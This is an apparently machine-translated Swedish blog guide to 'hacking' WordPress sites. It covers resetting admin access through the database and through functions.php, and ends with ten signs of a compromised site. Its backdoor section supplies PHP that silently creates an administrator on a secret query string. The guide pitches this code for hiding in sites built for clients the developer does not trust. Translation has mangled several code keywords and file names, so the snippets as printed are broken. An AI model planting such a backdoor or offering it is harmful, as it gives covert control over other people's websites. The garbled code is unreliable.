Hur man hackar in på en WordPress-webbplats, den kompletta guiden

Hur man hackar till en WordPress-webbplats, den kompletta guiden


Vi tillåter inte, godkänner eller uppmuntrar något olagligt eller skadligt beteende! Syftet med den här artikeln är att förklara hur du hackar eller återvänder åtkomst till en WordPress-webbplats som tillhör dig, eller att du har rättigheter att redigera, admin och åtkomst. Vad du än gör, gör du det på egen hand. Vi ansvarar inte för dina handlingar. Den här guiden fungerar endast för utbildningssyften.

Beskrivna metoder hjälper dig att få åtkomst till webbplatsen även om du inte längre har ett konto, men kommer att kräva lite information om webbplatsen och de hjälper dig inte hacka till någon slumpmässig WordPress-installation.

I den här guiden kommer vi att visa dig:

  • Hur man hackar till en WordPress-webbplats
  • Hur man skapar en bakdörr i WordPress
  • Hur man skapar ett nytt användarkonto via FTP
  • 10 tecken på att din WordPress-webbplats är hackad

Hur man hackar till en WordPress-webbplats, den kompletta guiden

Situationer du kan hjälpa dig själv i

Om du befinner dig i en av följande situationer hjälper våra metoder dig att få åtkomst igen:

  • du har glömt användarnamnet eller e-postadressen
  • alternativet för återställning av lösenord fungerar inte på värdservern
  • återställning av lösenordsmeddelanden kommer inte igenom
  • du har inte längre tillgång till kontoets e-postadress
  • du känner till användarnamn och lösenord, men kombinationen fungerar bara inte

För att använda metoderna som beskrivs nedan behöver du endast en av följande:

  • FTP-åtkomst till servern, eller
  • cPanelåtkomst till servern, eller
  • åtkomst till MySQL-databasen och möjligheten att ansluta till den på distans

Metod # 1 – MySQL-sättet

Använd den här metoden för att ändra lösenord (eller användarnamn vid behov) för en befintlig användare eller för att skapa ett nytt konto. Du behöver cPanel-åtkomst eller direkt MySQL-åtkomst till webbplatsens databas. Låt oss komma igång genom att ändra lösenordet för en befintlig användare.

Om du använder cPanel, logga in (cPanel kan alltid nås via https://yoursite.com:2083 länk), leta upp och öppna phpMyAdmin. Listan med databaser och tabeller finns till vänster. Du letar efter bordet som slutar på _users. Det kommer det förmodligen att vara wp_users, men om du har mer än en WordPress-webbplats installerad på servern måste du hitta rätt.

Den högra tabellen har den användare som du vill redigera i den. Följ samma procedur om du ansluter till MySQL via någon extern klient som SQLyog. När du har hittat tabellen och den faktiska användarposten är det dags att ändra lösenordet.

Som du antagligen har kommit fram till nu sparas lösenordet i user_pass fältet, hashad med hjälp av MD5-algoritmen. Öppna online MD5-generator ange lösenordet du vill använda och klicka på “Hash”. Kopiera den genererade strängen och ersätt det ursprungliga lösenordet med det. I phpMyAdmin kan du redigera fältet genom att dubbelklicka på det. Proceduren är liknande i andra MySQL-klienter. Spara ändringar och logga in på WordPress med ditt nya lösenord.

WP-användare tabell

Användarnamn, hashade lösenord och e-postmeddelanden lagras i wp_users databastabell

Fortfarande på metod nr 1 – skapa en ny användare

Att skapa en ny användare är lite mer komplicerat men ändå hanterbart på mindre än en minut. Skapa en ny post i användartabellen och fyll i: user_login, user_pass (hashed, med hjälp av MD5-funktionen som beskrivs ovan) och user_email. Alla andra fält kan förbli tomma; de spelar ingen roll. Spara den nya posten. När den har sparats kommer MySQL att ge den ett unikt ID. Det är numret i ID-fältet. Kom ihåg det.

Gå nu till _usermeta tabell. Kom ihåg, bordets prefix måste vara samma som användarens. Till exempel wp_users och wp_usersmeta. Om prefixet inte är samma, redigerar du fel tabell (med någon annan WP-installation) och det nya kontot fungerar inte. Vi skapar två nya poster. Ignorera umeta_id fält för dem båda. Uppsättning användar ID fältet till det värde du just kom ihåg (det nya ID-värdet i användartabellen). För den första skivuppsättningen meta_key till wpct_user_level och meta_value till 10. För den andra meta_key till wpct_capabilities och meta_value till a: 1: {s: 13: "administratör", b: en;}. Spara båda. Du är klar – logga in!

Metod # 2 – funktionen.php sätt

Detta tillvägagångssätt kan användas antingen genom att redigera features.php genom cPanel eller genom att använda en FTP-klient för att göra det. Om du använder cPanel, hitta File Manager och öppna den. Först måste vi hitta mappen för det aktiva temat.

Gå till public_html / wp_content / themes mapp. Om du omedelbart ser ditt tema och vet vilket tema det är – bra. Öppna mappen och börja redigera functions.php. Om inte, öppna webbplatsen, högerklicka var som helst, välj “Visa källa”. Tryck sedan på Ctrl + F och börja skriva / Teman / snart kommer du att ha många webbadresser markerade och du känner igen mappnamnet för det aktiva temat.

Hitta det i filstrukturen, öppna och börja redigera functions.php. Kopiera / klistra in följande kod i slutet av filen. Tänk på avslutningen ?> PHP-taggar om du har dem. De måste vara på sista raden. Så sätt in koden före dem.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'smeknamn' => $ new_user_email));

$ user = new WP_User ($ user_id);
$ User-> set_role (administratör);
}

Redigera bara de två första raderna i koden för att spegla ditt nya konto. Om det redan finns en användare i WP med det e-postmeddelandet skapas inte ett nytt konto, så se till att det är nytt. Ändra också lösenordet – inte hackas av skriptkiddies. När du har sparat filen öppnar du bara din webbplats, koden kommer att köras, ett nytt konto med administratörsbehörigheter skapat och du kan logga in med den.

När du har gjort det, kom ihåg att radera koden från functions.php.

Andra hackningsmetoder

Genom att känna till FTP-, cPanel- eller MySQL-lösenordet bevisar du att du har legitim åtkomsträtt till servern och därför borde ha tillgång till WordPress-installationen också. Om du inte har något av dessa konton, har du ingen nytta (hacking till andra människors webbplatser), och det är inte trevligt!

Kom ihåg att få obehörig åtkomst till alla datorer, webbplatser eller servrar är ett allvarligt brott och hanteras snabbt i de flesta länder.

Om du är rädd att din WordPress-webbplats kan hackas, kontrollera denna sida med gratis WordPress-säkerhetsskanner. Om du inte har tid att konfigurera din blogg, låt oss göra det åt dig.

Hur man skapar en bakdörr i WordPress

När ytterdörren är stängd kan du prova bakdörren. Detta kan låta som ett skadligt sätt att använda koden för att komma in på webbplatsen utan att ha tillgång till den, men det finns faktiskt tillfällen då du behöver kontrollera din egen webbplats om någon stal den.

Om det skapar webbplatser för andra människor något du gör, kommer det förr eller senare att finnas en klient som vägrar att betala dig för ditt arbete; en klient som tar bort din inloggningsinformation och tar över kontrollen över allt du har gjort. Ibland räcker det att skapa en ny användare via FTP eller återställa ett lösenord. När det inte räcker, kanske du vill hacka dig tillbaka in eller skapa en bakdörråtkomst till dina administrationssidor.

Men om du bestämde dig för att dölja en liten kodkod i din WordPress-miljö, kan du spara dig själv någon värdighet och få åtkomst till WordPress-webbplatsen med administratörsbehörighet. Och det är där spelen börjar.

Oavsett hur många gånger denna tjuv raderar din information eller återställer en säkerhetskopia på en server han antagligen äger, finns det en chans att han inte vet något om bakdörrens ingångar. Om han gjorde det, skulle han förmodligen inte ens behöva din hjälp med att ställa in WordPress, rätt?

Skapa en bakdörr:

OK, tillräckligt med samtalet; här är en kod som du behöver för att få jobbet gjort:

  1. Öppna filen filen.php
  2. Kopiera / klistra in följande kod:
  3. add_action ('wp_head', 'wploop_backdoor');
    funktion wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    kräva ( 'wp-includes / registration.php');
    Om (! Username_exists ('username')) {
    $ user_id = wp_create_user ('namn', 'pass');
    $ user = new WP_User ($ user_id);
    $ User-> set_role (administratör);
    }
    }
    }
    ?>
  4. Spara ändringar

Om du lämnar koden som den är, behöver du bara göra för att skapa en ny administratör på webbplatsen http://www.yourdomain.com/?backdoor=knockknock

När sidan laddats är ditt nya användarnamn “namn” och lösenord “passera”.

Självklart, Du kan ändra det i koden ovan genom att ändra “namn” och “pass” till vad du vill. Du kan också ändra länken till din bakdörr genom att ändra “bakdörr” och / eller “knockknock” till allt du kommer på.

Prova funktionen – inte bara det är roligt, men det kan verkligen hjälpa dig någon gång i framtiden när du ska skapa en webbplats för någon du inte kan lita helt på. Du bör också höja dina WordPress- och bloggfärdigheter.

Hur man skapar ett nytt användarkonto via FTP

Att skapa nya användarkonton på WordPress är mycket enkelt. Som administratör måste du göra det navigera till Användars admin sida där du kan skapa ett nytt konto för alla användarroller. Det kan göras på några sekunder och en nyskapad användare kan omedelbart logga in med givet användarnamn och lösenord.

Men vad händer om du tappar åtkomsten till din WordPress-admin? Saker kan bli lite mer komplicerade, men oroa dig inte – vi har en funktion för dig som kan rädda ditt adminliv.

Oavsett om en annan administratör har tagit bort ditt konto, om du har raderat alla användare från databasen av misstag, använt ett fungerande plugin eller blivit hackat, kan du fortfarande få tillbaka kontrollen. Ibland kan du kanske bara få åtkomst till din FTP-server medan HTTP-enheten kommer att vara utom räckhåll och du måste skapa en ny admin. Även om det kan vara ett sällsynt fall kommer följande funktion att rädda dig.

För att skapa ett nytt konto utanför WordPress adminmiljö, allt du behöver är en FTP-åtkomst till din webbplats. Som administratör bör du ha all nödvändig information för att logga in på din server och du kan snabbt skapa ett nytt konto genom att skapa en ny funktion i ditt tema.

Skapa ett nytt användarkonto via FTP:

  1. Öppna FTP-klienten och anslut till ditt konto
  2. Navigera till wp-innehåll / teman
  3. Öppna mappen för temat du använder
  4. Sök efter filen filen.php och redigera den
  5. Kopiera och klistra in följande funktion:
  6. funktion admin_account () {
    $ user = 'Användarnamn';
    $ pass = 'Lösenord';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = new WP_User ($ user_id);
    $ user-> set_role ('administratör');
    }}
    add_action ( 'init', 'admin_account');
    
  7. Ändra användarnamn, lösenord och e-post till något unikt
  8. Spara ändringar

Se till att användarnamn, lösenord och e-postadress som du anger i funktionen är unika eller annars fungerar inte funktionen ordentligt. När du har sparat ändringarna är du klar och du kan navigera till din WP-inloggningspanel. Använd ny information för att logga in igen och när du har verifierat kontot kan du ta bort funktionen från filen funct.php.

Funktionen som visas ovan skapar ett administratörskonto men du kan enkelt ändra det för att skapa ett konto med någon annan användarroll. Helt enkelt ändra rollen på 8th rad av koden till redaktören, författaren, bidragsgivaren, abonnenten eller någon annan användarroll du har skapat.

Tyvärr, om du har tappat ditt administratörskonto, har du också tappat alla inlägg skrivna under det användarnamnet. Det är därför du alltid bör hålla en säkerhetskopia som du enkelt kan hämta. Om du läser detta medan du har ditt administratörskonto, ta detta som en påminnelse om att skapa en säkerhetskopia omedelbart och bokmärke den här artikeln i fall du behöver skapa ett konto utanför WordPress i framtiden.

10 tecken på att din WordPress-webbplats är hackad

WordPress är en enorm bloggplattform. Det finns miljoner användare och det verkar som om antalet snabbt växer varje dag. Människor tenderar till och med att överföra sina webbplatser skapade i andra innehållshanteringssystem till detta open source-system oftare än du kanske tror. Och även om detta är bra, betyder det det hackare kommer också att sätta WordPress på ett plats när de försöker invadera slumpmässiga webbplatser.

Vanligtvis, om du blir hackad, vet du om det direkt. Din webbplats blir otillgänglig; du kan inte logga in och ibland lämnar en hacker till och med ett meddelande på första sidan. Men oftare än inte, kanske du inte ens märker att något har förändrats. I den här delen av artikeln kommer vi att visa dig flera tecken som kan visa dig att din WordPress-webbplats har hackats och några lösningar på problemet.

1. Misslyckad inloggning

Detta tecken är ganska tydligt. Om du har använt ett användarnamn och lösenordskombination länge utan att ha problem, kan du bli misstänksam om WordPress plötsligt inte känner igen ditt konto. Om en hackare måste logga in på din webbplats är chansen stor att han snabbt kommer att ändra dina administratörsbehörigheter.

Kanske fick han ändra ditt lösenord eller ta bort ditt konto helt. Innan du börjar få panik efter första gången WordPress meddelar dig om felaktigt användarnamn / lösenord, ska du tänka på det faktum att du kanske har angett en fel kombination eller att du kanske har aktiverat locklåsknappen.

Lösning: Prova att återställa lösenordet via e-post eller använd ett annat konto för att logga in igen. För att se till att du loggar in förblir säker, rekommenderar vi att du installerar Logga in Ninja plugin för WordPress.

2. Skadligt innehåll läggs till på din webbplats

Webbplatsen innehåller en varning om skadlig kod

Om du börjar märka okänt innehåll på din webbplats kan du börja oroa dig. När de får en chans att komma åt ditt administratörsområde, hackare kommer att kunna ändra din kärna och både dina tema- och plugin-filer. Det betyder att de får ändra allt de vill.

Medan vissa hackare kommer att ändra utseendet på din webbplats drastiskt och kanske till och med stava att du har hackat, kommer de andra att vara mycket mer subtila om det.

Lösning: Försök leta efter doldt innehåll i webbplatskoden. Det kan finnas länkar till skadliga webbplatshackare som är planterade i sidfoten på din webbplats, eller så kan de ha installerat popup-fönster som öppnas regelbundet för dina kunder. Använd Security Ninja för att skanna din webbplats eller kontinuerligt övervaka din webbplats för sådana problem.

3. Misstänkta besök

Om du inte spårar din webbplats bör du börja göra det omedelbart. Ett enkelt sätt att göra är att använda Google Analytics som bland många andra funktioner kan berätta hur många besök du får och var kommer dessa besök från. Efter en tid kommer du att lära känna din webbplats. Det betyder att du kommer att veta var kommer besöken kommer från, du vet när du startar en ny kampanj och när det finns nya kampanjlänkar släppta i naturen.

Men om du plötsligt märker att din webbplats får ett stort antal nya besök från den misstänkta domänen, du vill undersöka detta ytterligare eftersom din webbplats kanske bara hackas. Vanligtvis kommer den typen av besök att resultera i en avvisningsgrad på 100% vilket innebär att endast en sida öppnades. Hackare använder ofta automatiserade system som leder andra dåliga webbplatser till din. Oavsett om det är den dåliga koden som körs på din webbplats eller om du har blivit en del av ett skräppostnätverk kan saker bli allvarliga och du måste kontrollera din webbplats för skadlig kod.

Lösning: Använda sig av Googles webbansvariga verktyg att hitta misstänkta domäner

4. En plötslig minskning av trafiken

Säker surfning på webbplatsens status

Till skillnad från det sistnämnda tecknet på att bli hackad, kan den här varna dig eftersom det plötsligt faller antalet besök. Istället för att hänvisa nya besök till dig, en hackare kan skicka besök från din webbplats. Det kan hända eftersom en hackare omdirigerade din webbplats till en annan. Det andra skälet till att få färre besökare är att Google svartlistade din webbplats. Den här åtgärden visar ett meddelande till alla användare som kan välja att inte öppna din webbplats eftersom den är infekterad.

Lösning: Använd Googles Säker webbläsarstatus för att kontrollera om din webbplats är markerad som osäker och för närvarande är farlig att besöka.

5. Sökmotorns resultat är konstiga

Om du inte har märkt några förändringar på din webbplats, men du får reda på att sökresultaten i Google och andra sökmotorer är konstiga (visa olika titlar och annan metadata), kan det vara ett tydligt tecken på en hackad webbplats. En hacker kan ha ändrat ditt innehåll på ett sätt som bara kan synas för en expert. Ändringen skulle ändå vara synlig i sökmotorns resultat.

Lösning: Kontrollera din webbplats med Googles webbansvariga verktyg, och kolla om din webbplats har hackats med det här gratis onlineverktyg.

6. Du kan inte skicka / ta emot e-postmeddelanden

När en hacker har tillgång till din webbplats kommer han förmodligen att vilja använd din server för att skräppföra alla andra. När du upptäcker att du inte kan skicka eller ta emot nya e-postmeddelanden från din WordPress kan detta vara ett tydligt tecken på att du har hackat. Kontrollera din e-post igen och kolla sedan med din leverantör för att se till att det inte finns några fel.

Lösning: Testa din WordPress postfunktion med detta gratis plugin.

7. Webbplatsen finns inte

servern hittades inte

Det finns tillfällen då hackare inte kommer åt din webbplats för att plantera skadlig kod, omdirigera användare eller använda din e-post för skräppost. Ibland, allt de vill göra är att krascha din webbplats. Sällan tar en hacker framgångsrikt bort allt från hela servern. Det är därför det är viktigt att du är värd för dina filer hos ett känt värdföretag som kommer att ta säkerhet och också hålla dagliga eller åtminstone varje vecka säkerhetskopior av din webbplats. Det är bra att du också gör dina egna säkerhetskopior då och då så att webbplatsen snabbt kan återställas.

Lösning: Installera ett av de bästa plugins för säkerhetskopieringshantering i WordPress.

8. Misstänkta filer

Liknar skadligt innehåll som kan läggas till befintliga filer, en hacker kanske planterar extra filer var som helst i din rotmapp. Det är bra att veta din väg runt WordPress, men om du inte är så erfaren bör du ha ett säkerhetsverktyg till ditt förfogande som kan kontrollera alla dina filer och aktiviteter. Nyligen granskade vi Security Ninja, som är ett perfekt verktyg för att kontrollera alla dina WordPress-filer.

Lösning: Prova att leta efter filer som inte tillhör din WordPress-installation. Använd Security Ninja för att skanna din webbplats regelbundet och hitta dessa filer automatiskt. Ta sedan bort filerna eller ta bort den skadliga koden från infekterade filer. Glöm inte Core Scanner-tillägget för Security Ninja.

9. Nya medlemmar

Beroende på din webbplats är du kanske den enda som kan lägga till nya medlemmar. I så fall kan ett e-postmeddelande om nyregistrerade användare utlösa ett larm. Om det finns andra administratörer som har möjlighet att lägga till nya medlemmar, kolla med dem om misstänkt aktivitet.

Lösning: Ändra inloggningsadress med ett gratis plugin, begränsa åtkomst till din WordPress inloggningssida genom att använda .htpasswd-filen och använd Login Ninja för att skydda ditt inloggningsformulär hela tiden.

10. Kolla in schemalagda händelser på din server

Ibland gör en hackare inte något för din webbplats när de hittat sin väg. Istället, de kommer att lämna schemalagda evenemang vilket kan skada din webbplats någon gång i framtiden. Den här tekniken är farlig eftersom en hacker kan lämna oerfaren ofullständigt till en början. Du kan vara smittad och vet ingenting om det.

Lösning: Kontrollera dina CRON-jobb på en server du använder och se till att det inte finns några misstänkta schemalagda uppgifter.

Avslutar

Vi hoppas att den här artikeln hjälper dig att hantera ännu en säkrare WordPress-webbplats och att den hjälper dig att få åtkomst till den i dåliga situationer. Och även om din webbplats är ren, vänligen ta det inte för givet.
Se alltid till att din blogg är så säker som den kan vara. Vi föreslår säkerhetsplugins för WordPress som kan spara dig på de flesta tidpunkter. Fortfarande, var inte den som använder osäkra lösenord, och var försiktig när du hackar till din egen WordPress-webbplats.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked